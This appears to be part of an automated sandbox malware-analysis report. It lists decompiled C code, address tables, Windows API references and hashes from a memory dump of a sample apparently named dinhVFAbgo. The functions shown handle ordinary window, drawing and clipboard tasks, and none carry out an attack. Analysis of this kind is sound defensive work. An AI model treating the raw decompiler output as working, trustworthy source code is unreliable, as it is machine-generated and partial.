0x00caa13d
0x00caa143
0x00caa146
0x00caa147
0x00caa149
0x00caa15f
0x00caa165
0x00caa168
0x00caa345
0x00caa347
0x00caa14b
0x00caa14b
0x00caa152
0x00000000
0x00caa152
0x00caa149
0x00caa0c3
0x00caa0c6
0x00000000
0x00000000
0x00caa0c6
0x00caa0c1
0x00caa0b8
0x00caa0af
0x00caa348
0x00caa34d
0x00caa34d
0x00caa09c
0x00caa097

APIs

__EH_prolog3_GS.LIBCMT ref: 00CAA07B
OleDuplicateData.OLE32(?,?,00000000), ref: 00CAA10C
GlobalLock.KERNEL32 ref: 00CAA12F
CopyMetaFileA.GDI32(?,00000000), ref: 00CAA13D
GlobalUnlock.KERNEL32(00000000), ref: 00CAA14B
GlobalFree.KERNEL32 ref: 00CAA152
GlobalUnlock.KERNEL32(00000000), ref: 00CAA15F
CopyFileA.KERNEL32 ref: 00CAA30D

Part of subcall function 00CA9FF5: GlobalSize.KERNEL32(?), ref: 00CA9FFE
Part of subcall function 00CA9FF5: GlobalAlloc.KERNEL32(00002002,00000000,?,?,?,80070057,?,?,?,00CA9EEE,00000000,?,?,?,00CA9F1C,00000000), ref: 00CAA016
Part of subcall function 00CA9FF5: GlobalLock.KERNEL32 ref: 00CAA026
Part of subcall function 00CA9FF5: GlobalLock.KERNEL32 ref: 00CAA02F
Part of subcall function 00CA9FF5: GlobalSize.KERNEL32(00000000), ref: 00CAA03C
Part of subcall function 00CA9FF5: GlobalUnlock.KERNEL32(00000000), ref: 00CAA04D
Part of subcall function 00CA9FF5: GlobalUnlock.KERNEL32(?), ref: 00CAA056

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Global$Unlock$Lock$CopyFileSize$AllocDataDuplicateFreeH_prolog3_Meta
String ID:
API String ID: 1141703180-0
Opcode ID: 348d7c97e876e6fea6cbe25b2ef8e8810815a8343a52a3241e366e5a429a5d38
Instruction ID: c5a774107ae42636766adfc241e476a2895e4f9a19b79dc76fec9649d5aca480
Opcode Fuzzy Hash: 348d7c97e876e6fea6cbe25b2ef8e8810815a8343a52a3241e366e5a429a5d38
Instruction Fuzzy Hash: BB819D71504603EFDB149F69CD4993EBBB5FF8A704B048258F92A9B664DB30EE00DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CE43EA Relevance: 12.2, APIs: 8, Instructions: 169
windowCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00CE43EA(intOrPtr* __ecx, void* __edx, int _a4, struct tagPOINT _a8, signed short _a12) {
				signed int _v8;
				struct tagRECT _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t45;
				int _t54;
				void* _t64;
				intOrPtr _t68;
				intOrPtr* _t86;
				void* _t112;
				RECT* _t113;
				signed int _t122;
				void* _t123;

				_t112 = __edx;
				_t45 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t45 ^ _t122;
				_t86 = __ecx;
				 *0xe17a64(0);
				_t115 =  *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x228))))();
				if( *((char*)(__ecx + 0x170)) == 0) {
					__eflags = _t115;
					if(_t115 == 0) {
						L23:
						_t90 =  *(_t86 + 0xbc);
						 *((char*)(_t86 + 0x172)) = 0;
						__eflags =  *(_t86 + 0xbc);
						if(__eflags != 0) {
							E00D5026F(_t90, 0, 0);
						}
						_t51 = E00CB236A(_t86, _t86, __eflags);
						L26:
						return E00DDCBCE(_t51, _t86, _v8 ^ _t122, _t112, _t113, _t115);
					}
					__eflags =  *((char*)(__ecx + 0x172));
					if( *((char*)(__ecx + 0x172)) != 0) {
						goto L23;
					}
					_t54 = IsWindowVisible( *(_t115 + 0x20));
					__eflags = _t54;
					if(_t54 == 0) {
						goto L23;
					}
					MapWindowPoints( *(_t86 + 0x20),  *(_t115 + 0x20),  &_a8, 1);
					_t51 = SendMessageA( *(_t115 + 0x20), 0x202, _a4, (_a12 & 0x0000ffff) << 0x00000010 | _a8.x & 0x0000ffff);
					goto L26;
				}
				ReleaseCapture();
				 *((char*)(_t86 + 0x170)) = 0;
				if(_a4 != 0xffff) {
					 *(_t86 + 0x184) =  *(_t86 + 0x184) & 0x00000000;
				}
				 *0xe17a64(0);
				 *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0x30c))))();
				_t64 = E00D537D5(0xe6872c, _t112, E00CB277F(_t86, _t86, _t112, GetParent( *(_t86 + 0x20))));
				if(_t64 != 0) {
					_t111 =  *((intOrPtr*)(_t64 + 0x1b8));
					if( *((intOrPtr*)(_t64 + 0x1b8)) != 0) {
						E00D5B7C9(_t111);
					}
				}
				_t115 =  *( *_t86 + 0x1b8);
				 *0xe17a64();
				if(( *( *( *_t86 + 0x1b8))() & 0x00000002) == 0) {
					goto L23;
				} else {
					_t68 =  *((intOrPtr*)(_t86 + 0x1bc));
					if(_t68 != 0 ||  *((intOrPtr*)(_t86 + 0x1c0)) >= _t68) {
						_t113 =  &_v24;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t68 != 0) {
							_t121 =  *( *_t86 + 0x1b8);
							 *0xe17a64();
							if(( *( *( *_t86 + 0x1b8))() & 0x00000002) != 0) {
								E00D5893C(_t86, _t86 + 0x18c, _t112, _t121, 1);
							}
						}
						_v28 = _v28 & 0x00000000;
						 *0xe17a64();
						 *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0x31c))))();
						 *0xe17a64( &_v28);
						_t115 =  *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0x2b0))))();
						if(_v28 == 0 && IsRectEmpty( &_v24) == 0 && _t115 != _t86) {
							_t113 = _t123 - 0x10;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t115 =  *( *_t86 + 0x1fc);
							 *0xe17a64(5, 1);
							_t51 =  *( *( *_t86 + 0x1fc))();
						}
						goto L26;
					} else {
						goto L23;
					}
				}
			}

0x00ce43ea
0x00ce43f0
0x00ce43f7
0x00ce43fb
0x00ce440b
0x00ce441c
0x00ce441e
0x00ce4589
0x00ce458b
0x00ce45d6
0x00ce45d6
0x00ce45de
0x00ce45e4
0x00ce45e6
0x00ce45ea
0x00ce45ea
0x00ce45f1
0x00ce45f6
0x00ce4604
0x00ce4604
0x00ce458d
0x00ce4594
0x00000000
0x00000000
0x00ce4599
0x00ce459f
0x00ce45a1
0x00000000
0x00000000
0x00ce45af
0x00ce45ce
0x00000000
0x00ce45ce
0x00ce4424
0x00ce4431
0x00ce4438
0x00ce445b
0x00ce445b
0x00ce446e
0x00ce4476
0x00ce448d
0x00ce4494
0x00ce4496
0x00ce449e
0x00ce44a0
0x00ce44a0
0x00ce449e
0x00ce44a7
0x00ce44af
0x00ce44bb
0x00000000
0x00ce44c1
0x00ce44c1
0x00ce44c9
0x00ce44dd
0x00ce44e0
0x00ce44e1
0x00ce44e2
0x00ce44e3
0x00ce44e6
0x00ce44ea
0x00ce44f2
0x00ce44fe
0x00ce4508
0x00ce4508
0x00ce44fe
0x00ce450f
0x00ce451b
0x00ce4523
0x00ce4533
0x00ce4541
0x00ce4543
0x00ce456f
0x00ce4571
0x00ce4572
0x00ce4573
0x00ce4574
0x00ce4575
0x00ce457d
0x00ce4585
0x00ce4585
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce44c9

APIs

ReleaseCapture.USER32 ref: 00CE4424
IsWindow.USER32(?), ref: 00CE4445
DestroyWindow.USER32(?), ref: 00CE4455
GetParent.USER32(?), ref: 00CE447B
IsRectEmpty.USER32 ref: 00CE454D
IsWindowVisible.USER32(?), ref: 00CE4599
MapWindowPoints.USER32 ref: 00CE45AF
SendMessageA.USER32(?,00000202,?,?), ref: 00CE45CE

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$CaptureDestroyEmptyMessageParentPointsRectReleaseSendVisible
String ID:
API String ID: 3509494761-0
Opcode ID: d34aa505dafb585e80966201475d9d0999f7a68e2e0eda911fb76931d2eef2c3
Instruction ID: f89588bbbb29eb424588b89123e901b53210fd5879e96dc8eb8944552aba956a
Opcode Fuzzy Hash: d34aa505dafb585e80966201475d9d0999f7a68e2e0eda911fb76931d2eef2c3
Instruction Fuzzy Hash: 99519D306042519FDF19DF26C899BAE37B6EF49701F0440B9EC16AB295DF709E09CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CD6AE0 Relevance: 12.1, APIs: 8, Instructions: 144
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00CD6AE0(intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
				signed char _v8;
				struct tagPOINT _v16;
				void* __ebx;
				signed char _t64;
				signed int* _t65;
				void* _t70;
				int _t71;
				void* _t74;
				int _t75;
				intOrPtr _t77;
				void* _t80;
				signed char _t81;
				int _t87;
				signed char _t93;
				void* _t112;
				intOrPtr* _t113;
				intOrPtr _t114;

				_t112 = __edx;
				_t114 = _a4;
				_t93 = 0;
				_t113 = __ecx;
				if( *((intOrPtr*)(_t114 + 4)) != 0x201) {
					L15:
					__eflags =  *((intOrPtr*)(_t114 + 4)) - 0x202;
					if(__eflags != 0) {
						L23:
						return E00CB4A8F(_t113, __eflags, _t114);
					}
					__eflags = E00CBDF4E(_t113 + 0x114, 0xffffffff, 0xffffffff);
					if(__eflags == 0) {
						goto L23;
					}
					ReleaseCapture();
					_v16.x =  *(_t114 + 0x14);
					_v16.y =  *((intOrPtr*)(_t114 + 0x18));
					ScreenToClient( *( *((intOrPtr*)(_t113 + 0x110)) + 0x20),  &_v16);
					_t64 = E00CD771F( *((intOrPtr*)(_t113 + 0x110)), _v16.x, _v16.y, _t93);
					_v8 = _t64;
					__eflags = _t64;
					if(_t64 >= 0) {
						_t70 = E00DEC8A6(_t112, _v16.x -  *(_t113 + 0x114));
						_t71 = GetSystemMetrics(0x44);
						__eflags = _t70 - _t71;
						if(_t70 < _t71) {
							_t74 = E00DEC8A6(_t112, _v16.y -  *(_t113 + 0x118));
							_t75 = GetSystemMetrics(0x45);
							__eflags = _t74 - _t75;
							if(_t74 < _t75) {
								_t93 = 1;
								__eflags = 1;
							}
						}
					}
					_t65 = _t113 + 0x114;
					 *_t65 =  *_t65 | 0xffffffff;
					_t65[1] = _t65[1] | 0xffffffff;
					__eflags = _t93;
					if(_t93 != 0) {
						 *0xe17a64(_v8);
						 *((intOrPtr*)( *((intOrPtr*)( *_t113 + 0x190))))();
					}
					L14:
					return 1;
				}
				_t107 =  *((intOrPtr*)(__ecx + 0x110));
				if( *((intOrPtr*)(__ecx + 0x110)) == 0 || E00CD5BD5(_t107) != 0) {
					goto L15;
				} else {
					_t77 =  *((intOrPtr*)(__ecx + 0x110));
					if(_t77 != 0) {
						_v8 =  *(_t77 + 0x20);
					} else {
						_v8 = 0;
					}
					_t80 = E00CB277F(_t93, _t107, _t112, GetFocus());
					if(_t80 != 0) {
						_t81 =  *(_t80 + 0x20);
					} else {
						_t81 = _t93;
					}
					if(_v8 != _t81) {
						goto L15;
					} else {
						 *(_t113 + 0x114) =  *(_t113 + 0x114) | 0xffffffff;
						 *(_t113 + 0x118) =  *(_t113 + 0x118) | 0xffffffff;
						_v16.x =  *(_t114 + 0x14);
						_v16.y =  *((intOrPtr*)(_t114 + 0x18));
						ScreenToClient( *( *((intOrPtr*)(_t113 + 0x110)) + 0x20),  &_v16);
						_t87 = E00CD771F( *((intOrPtr*)(_t113 + 0x110)), _v16.x, _v16.y,  &_v8);
						if(_t87 < 0 || (_v8 & 0x00000004) == 0 || (SendMessageA( *( *((intOrPtr*)(_t113 + 0x110)) + 0x20), 0x102c, _t87, 3) & 0x00000003) != 3) {
							goto L23;
						} else {
							 *(_t113 + 0x114) = _v16.x;
							 *(_t113 + 0x118) = _v16.y;
							E00CB277F(_t93, _v16.y, _t112, SetCapture( *(_t113 + 0x20)));
							goto L14;
						}
					}
				}
			}

0x00cd6ae0
0x00cd6ae8
0x00cd6aeb
0x00cd6aee
0x00cd6af7
0x00cd6bec
0x00cd6bec
0x00cd6bf3
0x00cd6cbe
0x00000000
0x00cd6cc1
0x00cd6c08
0x00cd6c0a
0x00000000
0x00000000
0x00cd6c10
0x00cd6c1c
0x00cd6c29
0x00cd6c2f
0x00cd6c42
0x00cd6c47
0x00cd6c4a
0x00cd6c4c
0x00cd6c58
0x00cd6c62
0x00cd6c68
0x00cd6c6a
0x00cd6c76
0x00cd6c80
0x00cd6c86
0x00cd6c88
0x00cd6c8c
0x00cd6c8c
0x00cd6c8c
0x00cd6c88
0x00cd6c6a
0x00cd6c8d
0x00cd6c93
0x00cd6c96
0x00cd6c9a
0x00cd6c9c
0x00cd6caf
0x00cd6cb7
0x00cd6cb7
0x00cd6be4
0x00000000
0x00cd6be6
0x00cd6afd
0x00cd6b05
0x00000000
0x00cd6b18
0x00cd6b18
0x00cd6b20
0x00cd6b2a
0x00cd6b22
0x00cd6b22
0x00cd6b22
0x00cd6b34
0x00cd6b3b
0x00cd6b41
0x00cd6b3d
0x00cd6b3d
0x00cd6b3d
0x00cd6b47
0x00000000
0x00cd6b4d
0x00cd6b4d
0x00cd6b54
0x00cd6b61
0x00cd6b6e
0x00cd6b74
0x00cd6b8a
0x00cd6b91
0x00000000
0x00cd6bc3
0x00cd6bcc
0x00cd6bd2
0x00cd6bdf
0x00000000
0x00cd6bdf
0x00cd6b91
0x00cd6b47

APIs

GetFocus.USER32 ref: 00CD6B2D
ScreenToClient.USER32 ref: 00CD6B74
SendMessageA.USER32(?,0000102C,00000000,00000003), ref: 00CD6BB2
SetCapture.USER32(?), ref: 00CD6BD8
ReleaseCapture.USER32(000000FF,000000FF), ref: 00CD6C10
ScreenToClient.USER32 ref: 00CD6C2F
GetSystemMetrics.USER32 ref: 00CD6C62
GetSystemMetrics.USER32 ref: 00CD6C80

Part of subcall function 00CD5BD5: SendMessageA.USER32(?,00001018,00000000,00000000), ref: 00CD5BE1

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CaptureClientMessageMetricsScreenSendSystem$FocusRelease
String ID:
API String ID: 3871486171-0
Opcode ID: 998b81b636431172759c573c37d7941fb6e6cb905b6f32106b67ad5af5d9051d
Instruction ID: 46f82e243b320d3ec8e74fa62c193fb8372fc31ea57fa1efa65bb7f90b61b0c7
Opcode Fuzzy Hash: 998b81b636431172759c573c37d7941fb6e6cb905b6f32106b67ad5af5d9051d
Instruction Fuzzy Hash: 1E519F71A00609AFCB18DFB5C9459E9BBB5FF08710F10426AE676D7390E730AE50DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CE73EC Relevance: 12.1, APIs: 8, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00CE73EC(void* __ebx, void* __edx, signed int __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t54;
				intOrPtr _t55;
				void* _t58;
				void* _t65;
				void* _t69;
				void* _t87;
				intOrPtr _t88;
				void* _t90;
				intOrPtr _t94;
				void* _t103;
				int _t105;
				intOrPtr _t107;
				void* _t114;
				void* _t119;

				_t119 = __fp0;
				_t108 = __esi;
				_t104 = __edi;
				_t103 = __edx;
				_push(0x18);
				E00DDD52C(0xe0ad93, __ebx, __edi, __esi);
				_t94 =  *((intOrPtr*)(_t114 + 8));
				if( *0xe872e4 == 0) {
					__eflags =  *(_t114 + 0x20);
					if( *(_t114 + 0x20) != 0) {
						DrawFocusRect( *(_t94 + 4), _t114 + 0xc);
					}
					_t105 = _t104 | 0xffffffff;
					InflateRect(_t114 + 0xc, _t105, _t105);
					_t54 = E00CC19ED();
					__eflags =  *(_t114 + 0x28);
					if( *(_t114 + 0x28) == 0) {
						_t55 =  *((intOrPtr*)(_t54 + 0x54));
					} else {
						_t55 =  *((intOrPtr*)(_t54 + 0x6c));
					}
					_push(_t55);
					E00CC0A96(_t94, _t94, _t105, _t108, _t114 + 0xc);
					_t58 = E00CC19ED();
					E00CC0750(_t114 + 0xc,  *((intOrPtr*)(E00CC19ED() + 0x60)),  *((intOrPtr*)(_t58 + 0x5c)));
					InflateRect(_t114 + 0xc, _t105, _t105);
					_t65 = E00CC19ED();
					_t69 = E00CC0750(_t114 + 0xc,  *((intOrPtr*)(E00CC19ED() + 0x58)),  *((intOrPtr*)(_t65 + 0x64)));
					__eflags =  *((intOrPtr*)(_t114 + 0x1c)) - 1;
					if(__eflags != 0) {
						__eflags =  *((intOrPtr*)(_t114 + 0x1c)) - 2;
						if( *((intOrPtr*)(_t114 + 0x1c)) == 2) {
							InflateRect(_t114 + 0xc, _t105, _t105);
							_t39 = _t114 - 0x10;
							 *_t39 =  *(_t114 - 0x10) & 0x00000000;
							__eflags =  *_t39;
							 *((intOrPtr*)(_t114 - 0x14)) = 0xe1966c;
							 *((intOrPtr*)(_t114 - 4)) = 1;
							E00CB9BC6(_t94, _t114 - 0x14, _t105, CreateHatchBrush(5,  *(E00CC19ED() + 0x28)));
							FillRect( *(_t94 + 4), _t114 + 0xc,  *(_t114 - 0x10));
							 *((intOrPtr*)(_t114 - 0x14)) = 0xe1966c;
							_t69 = E00CB91F0(_t114 - 0x14, _t103);
						}
					} else {
						 *((intOrPtr*)(_t114 - 0x1c)) = 0;
						 *((intOrPtr*)(_t114 - 0x18)) = 0;
						_t69 = E00D09EB6(_t103, __eflags, _t119, _t94, 2, _t114 + 0xc, 0, _t114 - 0x1c);
					}
				} else {
					E00D0A290(_t114 - 0x1c, _t94);
					_t106 = __edi | 0xffffffff;
					 *((intOrPtr*)(_t114 - 4)) = 0;
					InflateRect(_t114 + 0xc, __edi | 0xffffffff, _t106);
					_t107 =  *((intOrPtr*)(E00CC19ED() + 0x58));
					_t87 = E00CC19ED();
					_t117 =  *(_t114 + 0x28);
					if( *(_t114 + 0x28) == 0) {
						_t88 =  *((intOrPtr*)(_t87 + 0x54));
					} else {
						_t88 =  *((intOrPtr*)(_t87 + 0x6c));
					}
					_push(_t107);
					_push(_t88);
					_push(_t114 + 0xc);
					_t90 = E00D0BD04(_t94, _t114 - 0x1c, _t107, 0, _t117);
					_t118 =  *((intOrPtr*)(_t114 + 0x1c)) - 1;
					if( *((intOrPtr*)(_t114 + 0x1c)) == 1) {
						 *((intOrPtr*)(_t114 - 0x24)) = 0;
						 *((intOrPtr*)(_t114 - 0x20)) = 0;
						_t90 = E00D09EB6(_t103, _t118, _t119, _t94, 2, _t114 + 0xc, 0, _t114 - 0x24);
					}
					_t69 = E00D0A2A5(_t90, _t114 - 0x1c);
				}
				return E00DDD4FA(_t69);
			}

0x00ce73ec
0x00ce73ec
0x00ce73ec
0x00ce73ec
0x00ce73ec
0x00ce73f3
0x00ce73ff
0x00ce7402
0x00ce7473
0x00ce7477
0x00ce7480
0x00ce7480
0x00ce7486
0x00ce748f
0x00ce7495
0x00ce749a
0x00ce749e
0x00ce74a5
0x00ce74a0
0x00ce74a0
0x00ce74a0
0x00ce74a8
0x00ce74af
0x00ce74b4
0x00ce74cc
0x00ce74d7
0x00ce74dd
0x00ce74f5
0x00ce74fa
0x00ce74fe
0x00ce751b
0x00ce751f
0x00ce7527
0x00ce752d
0x00ce752d
0x00ce752d
0x00ce7536
0x00ce7539
0x00ce7555
0x00ce7564
0x00ce756d
0x00ce7570
0x00ce7570
0x00ce7500
0x00ce750a
0x00ce7511
0x00ce7514
0x00ce7514
0x00ce7404
0x00ce7408
0x00ce740d
0x00ce7418
0x00ce741b
0x00ce7426
0x00ce7429
0x00ce742e
0x00ce7431
0x00ce7438
0x00ce7433
0x00ce7433
0x00ce7433
0x00ce743b
0x00ce743c
0x00ce7440
0x00ce7444
0x00ce7449
0x00ce744d
0x00ce7452
0x00ce745a
0x00ce7461
0x00ce7461
0x00ce7469
0x00ce7469
0x00ce757a

APIs

__EH_prolog3.LIBCMT ref: 00CE73F3
InflateRect.USER32(?), ref: 00CE741B
DrawFocusRect.USER32 ref: 00CE7480
InflateRect.USER32(?), ref: 00CE748F
InflateRect.USER32(?), ref: 00CE74D7
InflateRect.USER32(?), ref: 00CE7527
CreateHatchBrush.GDI32(00000005,?,?,?,?,?,?,?), ref: 00CE754B
FillRect.USER32 ref: 00CE7564

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Inflate$BrushCreateDrawFillFocusH_prolog3Hatch
String ID:
API String ID: 4128771895-0
Opcode ID: a8a5323a55e50fbcef87ee8b428151f96938958caf962a1355edee50191267a2
Instruction ID: cfb139f0024d8888e4144b215c9bdc1d9bd3d05f50440b943169885ec89875cd
Opcode Fuzzy Hash: a8a5323a55e50fbcef87ee8b428151f96938958caf962a1355edee50191267a2
Instruction Fuzzy Hash: 5B510BB1800109AFCB10EFA2CD45EEE7BBCEF45710F14821AF915A71A2DB349A45DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CB4ED3 Relevance: 12.1, APIs: 8, Instructions: 136
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00CB4ED3(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, struct tagRECT* _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				struct tagRECT _v36;
				void* _v40;
				int _v44;
				int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				intOrPtr _t69;
				struct tagRECT* _t82;
				void* _t92;
				signed int _t93;
				struct HWND__* _t94;
				signed int _t99;

				_t92 = __edx;
				_t83 = __ecx;
				_t60 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t60 ^ _t99;
				_v16 = _v16 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_t82 = _a20;
				_v44 = 0;
				_v12 = _a28;
				_t93 = __ecx;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x20),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t93 = __ecx;
				}
				_t98 = _a16 & 0xffff7fff;
				if(_t98 == 1) {
					_t16 =  &_v40;
					 *_t16 = _v40 & 0x00000000;
					__eflags =  *_t16;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t66 = GetTopWindow( *(_t93 + 0x20));
				while(1) {
					_t94 = _t66;
					if(_t94 == 0) {
						break;
					}
					_v48 = GetDlgCtrlID(_t94);
					_t83 = E00CB27A9(_t83, _t94, __eflags, _t94);
					_t69 = _v48;
					__eflags = _t69 - _a12;
					if(__eflags != 0) {
						__eflags = _t69 - _a4;
						if(__eflags >= 0) {
							__eflags = _t69 - _a8;
							if(__eflags <= 0) {
								__eflags = _t83;
								if(__eflags != 0) {
									SendMessageA(_t94, 0x361, 0,  &_v40);
								}
							}
						}
					} else {
						_v44 = _t94;
					}
					_t66 = GetWindow(_t94, 2);
				}
				if(_t98 != 1) {
					__eflags = _a12;
					if(_a12 != 0) {
						_t94 = _v44;
						__eflags = _t94;
						if(_t94 != 0) {
							_t66 = E00CB277F(_t82, _t83, _t92, _t94);
							_v44 = _t66;
							__eflags = _t98 - 2;
							if(_t98 == 2) {
								_v36.left = _v36.left + _t82->left;
								_v36.top = _v36.top + _t82->top;
								_v36.right = _v36.right - _t82->right;
								_t46 =  &(_v36.bottom);
								 *_t46 = _v36.bottom - _t82->bottom;
								__eflags =  *_t46;
								_t66 = _v44;
							}
							__eflags = _a16 & 0x00008000;
							if((_a16 & 0x00008000) == 0) {
								_t98 =  *( *_t66 + 0x68);
								 *0xe17a64( &_v36, 0);
								 *( *( *_t66 + 0x68))();
								_t66 = E00CB133E( &_v40, _t94,  &_v36);
							}
						}
					}
					__eflags = _v40;
					if(_v40 != 0) {
						_t66 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == _t66) {
						_t82->top = _t82->top & 0x00000000;
						_t82->left = _t82->left & 0x00000000;
						_t82->right = _v20;
						_t66 = _v16;
						_t82->bottom = _v16;
					} else {
						_t66 = CopyRect(_t82,  &_v36);
					}
				}
				return E00DDCBCE(_t66, _t82, _v8 ^ _t99, _t92, _t94, _t98);
			}

0x00cb4ed3
0x00cb4ed3
0x00cb4ed9
0x00cb4ee0
0x00cb4ee3
0x00cb4ee9
0x00cb4eee
0x00cb4ef5
0x00cb4efb
0x00cb4eff
0x00cb4f03
0x00cb4f17
0x00cb4f05
0x00cb4f08
0x00cb4f09
0x00cb4f0a
0x00cb4f0b
0x00cb4f0c
0x00cb4f0c
0x00cb4f20
0x00cb4f29
0x00cb4f38
0x00cb4f38
0x00cb4f38
0x00cb4f2b
0x00cb4f33
0x00cb4f33
0x00cb4f3f
0x00cb4f8f
0x00cb4f8f
0x00cb4f93
0x00000000
0x00000000
0x00cb4f4f
0x00cb4f57
0x00cb4f59
0x00cb4f5c
0x00cb4f5f
0x00cb4f66
0x00cb4f69
0x00cb4f6b
0x00cb4f6e
0x00cb4f70
0x00cb4f72
0x00cb4f80
0x00cb4f80
0x00cb4f72
0x00cb4f6e
0x00cb4f61
0x00cb4f61
0x00cb4f61
0x00cb4f89
0x00cb4f89
0x00cb4f98
0x00cb4fc4
0x00cb4fc8
0x00cb4fca
0x00cb4fcd
0x00cb4fcf
0x00cb4fd2
0x00cb4fd7
0x00cb4fda
0x00cb4fdd
0x00cb4fe1
0x00cb4fe7
0x00cb4ff0
0x00cb4ff3
0x00cb4ff3
0x00cb4ff3
0x00cb4ff6
0x00cb4ff6
0x00cb4ff9
0x00cb5000
0x00cb500a
0x00cb500f
0x00cb5018
0x00cb5023
0x00cb5023
0x00cb5000
0x00cb4fcf
0x00cb5028
0x00cb502c
0x00cb5031
0x00cb5031
0x00cb4f9a
0x00cb4f9d
0x00cb4fb2
0x00cb4fb6
0x00cb4fb9
0x00cb4fbc
0x00cb4fbf
0x00cb4f9f
0x00cb4fa4
0x00cb4fa4
0x00cb4f9d
0x00cb5045

APIs

GetClientRect.USER32(?,?), ref: 00CB4F17
BeginDeferWindowPos.USER32(00000008), ref: 00CB4F2D
GetTopWindow.USER32(?), ref: 00CB4F3F
GetDlgCtrlID.USER32 ref: 00CB4F48
SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 00CB4F80
GetWindow.USER32(00000000,00000002), ref: 00CB4F89
CopyRect.USER32 ref: 00CB4FA4
EndDeferWindowPos.USER32(00000000), ref: 00CB5031

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
